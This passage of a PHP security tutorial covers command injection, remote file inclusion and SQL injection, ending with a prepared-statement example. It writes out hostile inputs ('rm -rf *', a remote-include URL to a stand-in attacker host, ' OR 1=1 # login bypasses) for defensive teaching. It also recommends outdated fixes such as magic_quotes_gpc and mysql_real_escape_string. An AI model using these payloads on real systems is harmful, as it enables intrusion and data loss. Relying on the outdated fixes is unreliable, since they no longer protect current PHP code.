3. Issues with functions like exec(), system() and backticks:
Passing a user-supplied value to the exec() function can have very bad results.
With system($input_from_user), the user can enter any command as input and have it executed.
All the contents can even be deleted just by giving "rm -rf *".
In the exec() function, too, the user can run any command by simply putting a semicolon (;) in the argument section.
Disable insecure functions with the disable_functions directive in php.ini, e.g. disable_functions = system,exec
Use escapeshellcmd() – if you allow the user to specify commands.
Use escapeshellarg() – if you allow the user to specify arguments. It puts single quotes around the string and escapes any existing single quotes inside it.
4. Issues with Including Files:
Passing the page path as a variable may get you in trouble.
The user can include a remote file which may contain malicious scripts. The hacker can also include other local files.
If a PHP page include.php is like
$page = $_GET['path'];
include($page);
then include.php?path=http://hackingsite.com/hacking.php will include the remote file hacking.php, so the hacker can execute the hacking.php script on your server.
It can be disabled by setting allow_url_fopen = Off in php.ini.
Also set open_basedir correctly in php.ini.
open_basedir restricts file inclusion to the defined directory.
Also check the file name with a 'switch' or 'if' to make sure that it is an allowed one.
5. Issues with SQL Injection Attacks:
Consider the script below:
$user = $_POST['username'];
$pass = $_POST['password'];
$result = mysql_query("SELECT AcctNo FROM Users WHERE Username = '".$user."' and Password = '".$pass."'");
If the user has entered the username
' OR 1=1 #
and any password (XXXX below), then the query will be
SELECT AcctNo FROM Users WHERE Username = '' OR 1=1 #' and Password = 'XXXX'
MySQL treats everything after the # as a comment, so it ignores it.
The remaining query always selects all the account numbers and returns them, so the user gets the account numbers even though he does not have a correct username and password.
Giving the password as a value like ' OR 'X' = 'X will also bypass this query.
The problem here comes from the ' (single quotes) entered by the user.
There are two ways to disable it.
The first is the function addslashes(). It adds a \ (backslash) before every ' (quote), so the quote has no effect.
So before executing the query you should pass the input through the mysql_real_escape_string() function. That is, it should be like
$user = mysql_real_escape_string($_POST['username']);
$pass = mysql_real_escape_string($_POST['password']);
Another option is magic_quotes_gpc. You can set it to On in php.ini.
If it is On, PHP adds a backslash before all single and double quotes in strings coming from an HTML form, so they are escaped.
Or use prepared statements.
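As an added example (not code from the original post), the concatenated query from section 5 is placed next to a prepared-statement version of the same lookup. It assumes the Users(AcctNo, Username, Password) table from the text and a PDO MySQL connection; the DSN and credentials are placeholders.

```php
<?php
// Added example: string-built query vs. a prepared statement.
// Assumes the Users table from the text and PDO with the MySQL driver;
// host, database name and credentials below are placeholders.

// 1. The vulnerable form from the text: the user's quote characters
//    become part of the SQL syntax.
function buildVulnerableQuery(string $user, string $pass): string
{
    return "SELECT AcctNo FROM Users WHERE Username = '" . $user
         . "' and Password = '" . $pass . "'";
}

// Constructed inputs from the text: the username closes the quote and
// the # comments out the password check, so the WHERE clause is always true.
// This prints the same bypassed query the text shows.
echo buildVulnerableQuery("' OR 1=1 #", "XXXX"), PHP_EOL;

// 2. The hardened form: the query text is fixed at prepare() time and the
//    values are sent separately, so a quote in $user can never end the literal.
function findAccount(PDO $db, string $user, string $pass): ?string
{
    // Use real server-side prepares rather than client-side emulation.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare(
        'SELECT AcctNo FROM Users WHERE Username = :user AND Password = :pass'
    );
    $stmt->execute([':user' => $user, ':pass' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? (string) $row['AcctNo'] : null;
}

$db = new PDO(
    'mysql:host=DB_HOST_PLACEHOLDER;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASS_PLACEHOLDER',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);

// With the same payload, the prepared statement searches for a user whose
// name is literally "' OR 1=1 #" and returns null instead of every AcctNo.
var_dump(findAccount($db, "' OR 1=1 #", "XXXX"));
```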